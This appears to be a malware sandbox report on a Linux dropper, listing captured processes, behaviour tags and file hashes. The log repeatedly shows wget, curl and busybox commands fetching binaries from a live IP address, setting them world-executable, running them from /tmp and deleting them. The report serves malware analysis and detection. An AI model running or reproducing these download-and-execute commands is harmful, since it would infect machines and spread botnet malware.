/usr/bin/wgetwget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:937
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:943
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:949
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:955
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:961
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:967
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:973
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:976
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97